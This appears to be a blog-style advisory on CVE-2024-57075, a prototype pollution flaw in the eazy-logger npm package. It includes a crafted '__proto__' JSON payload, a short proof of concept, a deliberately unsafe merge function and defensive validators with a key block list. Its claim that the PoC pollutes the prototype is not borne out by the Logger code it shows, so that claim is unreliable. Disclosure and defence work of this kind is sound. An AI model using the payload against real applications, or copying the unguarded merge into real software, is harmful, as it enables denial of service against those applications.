eazy-logger, an npm package widely used as a simple and customizable logging utility, has been found to contain a critical vulnerability in its v4.0.1 release. The issue has been assigned CVE-2024-57075 and should be patched promptly to mitigate the potential attack.
This post will explore the details of this vulnerability, how to reproduce the exploit, how it affects the lib.Logger function, and the possible steps to fix the issue. Furthermore, we will provide relevant code snippets, links to original references, and advice to safeguard your applications from such attacks.
Background on Prototype Pollution
Prototype Pollution is a class of flaw in JavaScript applications in which untrusted input is allowed to modify an object's prototype, most often Object.prototype. Because every object inherits from that prototype, a property written there appears on all instances at once, and an attacker can use this to compromise the application's integrity, leading to Denial of Service (DoS), Remote Code Execution (RCE), or property injection.
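The following is an added illustration of the mechanism just described; it is not code from eazy-logger or from the original post. It uses a deliberately unguarded recursive merge (a hypothetical helper named unsafeMerge) to show how a JSON document containing a "__proto__" key reaches Object.prototype, and a hardened merge (safeMerge) that skips the three keys through which a prototype can be reached. The payload string is constructed for the demonstration.

```javascript
// Added example (not eazy-logger's code): how an unguarded recursive merge
// lets a parsed JSON payload write to Object.prototype, and a hardened merge
// that does not. Both helpers and the payload are constructed for this demo.

// Vulnerable: copies every own key of `source` into `target`. JSON.parse stores
// "__proto__" as an ordinary own property, so Object.keys() returns it; reading
// target["__proto__"] then yields Object.prototype, and the recursion writes
// the nested properties straight onto it.
function unsafeMerge(target, source) {
  for (const key of Object.keys(source)) {
    const value = source[key];
    if (value && typeof value === 'object') {
      if (!target[key] || typeof target[key] !== 'object') target[key] = {};
      unsafeMerge(target[key], value);
    } else {
      target[key] = value;
    }
  }
  return target;
}

// Hardened: refuse the keys that can reach a prototype, and only descend into
// properties that `target` actually owns (never an inherited accessor).
const BLOCKED_KEYS = new Set(['__proto__', 'constructor', 'prototype']);

function safeMerge(target, source) {
  for (const key of Object.keys(source)) {
    if (BLOCKED_KEYS.has(key)) continue; // drop pollution vectors outright
    const value = source[key];
    if (value && typeof value === 'object' && !Array.isArray(value)) {
      const owned = Object.prototype.hasOwnProperty.call(target, key);
      if (!owned || typeof target[key] !== 'object' || target[key] === null) {
        target[key] = {};
      }
      safeMerge(target[key], value);
    } else {
      target[key] = value;
    }
  }
  return target;
}

// Constructed payload, same shape as the one discussed in this post.
const CONSTRUCTED_PAYLOAD =
  '{"__proto__":{"level":"info","message":"Prototype pollution attack!"}}';

// Runs one merge strategy against the payload and reports whether an unrelated,
// freshly created object picked up the injected "level" property. The injected
// properties are removed afterwards so repeated calls start from a clean state.
function prototypeGetsPolluted(merge) {
  merge({}, JSON.parse(CONSTRUCTED_PAYLOAD));
  const unrelated = {};                  // never touched by the merge
  const polluted = 'level' in unrelated; // true only if Object.prototype changed
  delete Object.prototype.level;
  delete Object.prototype.message;
  return polluted;
}

console.log('unsafeMerge pollutes Object.prototype:', prototypeGetsPolluted(unsafeMerge));
console.log('safeMerge pollutes Object.prototype:', prototypeGetsPolluted(safeMerge));
```

Note that the `in` operator is what makes the pollution visible: a polluted property is inherited, not owned, so `Object.keys(unrelated)` would still be empty while `unrelated.level` already reads "info". Any code that does `config.level || defaults.level` is therefore affected even though it never touched the payload.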
The Vulnerability (CVE-2024-57075)
In eazy-logger v4.0.1, there is a prototype pollution vulnerability within the lib.Logger function that allows an attacker to trigger a remote DoS. CVE-2024-57075 can be exploited by injecting a crafted payload into the log event stream; the payload manipulates object properties and leads to a Denial of Service condition in the application.
The affected code snippet
// lib/Logger.js
// `defaults` is the module's built-in levels/colors table, defined elsewhere in the file.
const Logger = function (config) {
  // The caller-supplied config object is stored as-is, without validating its keys.
  this.config = config;
  this.levels = this.config.levels || defaults.levels;
  this.colors = this.config.colors || defaults.colors;
};
Exploiting the Vulnerability
An attacker could exploit this vulnerability by supplying a malicious payload to the vulnerable eazy-logger function. Consider the following example of a crafted payload:
{
  "__proto__": {
    "level": "info",
    "message": "Prototype pollution attack!"
  }
}
By supplying this payload to the Logger function, the prototype would be polluted, and all subsequent log entries would inadvertently acquire the injected properties, causing a DoS condition within the affected application.
Proof-of-Concept Example
const EazyLogger = require('eazy-logger').Logger;
// Crafted configuration: a parsed JSON document whose top-level key is "__proto__".
const payload = JSON.parse('{"__proto__":{"level":"info","message":"Prototype pollution attack!"}}');
// Pass the crafted object straight into the vulnerable Logger constructor.
const log = EazyLogger(payload);
log.info('This should log a normal message, but it gets polluted by the payload.');
When running the above script, you can observe the application logging the injected message instead of the intended log entry, indicating a successful exploit of this vulnerability.
Original References
1. NVD - National Vulnerability Database
2. Eazy-Logger GitHub Repository
Mitigation Steps
1. Upgrade to the latest version of eazy-logger that has addressed this issue.
2. Monitor your application logs and filter any suspicious payloads to prevent unauthorized manipulations.
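The second step above is easier to act on with a concrete filter. The code below is an added example, not part of the original post or of eazy-logger: it assumes a logger configuration arrives as JSON from an untrusted source (a request body, a config file, a queue message) and shows a parser that rejects any payload containing a prototype-reaching key before the object is ever handed to a Logger constructor, plus a runtime check that reports whether Object.prototype has gained own properties since start-up. The sample payloads and the "prefix" option are constructed for the demonstration.

```javascript
// Added example (not eazy-logger's code): validate untrusted JSON configuration
// before it reaches a logger, and detect pollution at runtime if something slipped past.

const POLLUTION_KEYS = new Set(['__proto__', 'constructor', 'prototype']);

// Snapshot of Object.prototype's own property names taken at module load,
// used as the baseline for the runtime integrity check below.
const BASELINE = new Set(Object.getOwnPropertyNames(Object.prototype));

// Walks a parsed JSON value and returns the dotted path of every key that could
// reach a prototype. Object.keys() is used on purpose: JSON.parse stores
// "__proto__" as an own property, which is exactly what must be flagged.
function findPollutionKeys(value, path = [], found = []) {
  if (value === null || typeof value !== 'object') return found;
  if (Array.isArray(value)) {
    value.forEach((item, i) => findPollutionKeys(item, path.concat(String(i)), found));
    return found;
  }
  for (const key of Object.keys(value)) {
    const here = path.concat(key);
    if (POLLUTION_KEYS.has(key)) found.push(here.join('.'));
    findPollutionKeys(value[key], here, found);
  }
  return found;
}

// Parses untrusted JSON and fails closed if any pollution key is present.
// Rejecting (rather than silently stripping) gives you an event to alert on.
function parseTrustedConfig(text) {
  const parsed = JSON.parse(text);
  const offenders = findPollutionKeys(parsed);
  if (offenders.length > 0) {
    throw new Error(`rejected config: pollution keys at ${offenders.join(', ')}`);
  }
  return parsed;
}

// Runtime integrity check: returns the names of any own properties that have
// appeared on Object.prototype since the baseline was taken. An empty array
// means clean; anything else should fail a health check loudly.
function newPrototypeProperties() {
  return Object.getOwnPropertyNames(Object.prototype).filter((k) => !BASELINE.has(k));
}

// Convenience wrapper that reports the validation outcome as a string,
// which is what a request handler or config loader would log.
function classifyConfig(text) {
  try {
    parseTrustedConfig(text);
    return 'accepted';
  } catch (err) {
    return `rejected (${err.message})`;
  }
}

// Constructed sample inputs: one benign configuration and the crafted payload
// discussed in this post.
const BENIGN_CONFIG = '{"level":"info","prefix":"[app] "}';
const CRAFTED_CONFIG = '{"__proto__":{"level":"info","message":"Prototype pollution attack!"}}';

console.log('benign :', classifyConfig(BENIGN_CONFIG));
console.log('crafted:', classifyConfig(CRAFTED_CONFIG));
console.log('new Object.prototype properties:', newPrototypeProperties());
```

Run the validation at the trust boundary, before any merge or constructor sees the object, and call the integrity check from a periodic health check or after loading configuration; the baseline snapshot must be taken before any untrusted input is processed for the check to be meaningful.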
In conclusion, this vulnerability highlights the need to keep application libraries up to date and to follow secure coding practices. A thorough security model with periodic vulnerability assessments and continuous monitoring of your application's behavior will minimize the chances of future exploitation.
Timeline
Published on: 02/05/2025 22:15:31 UTC
Last modified on: 03/13/2025 15:15:50 UTC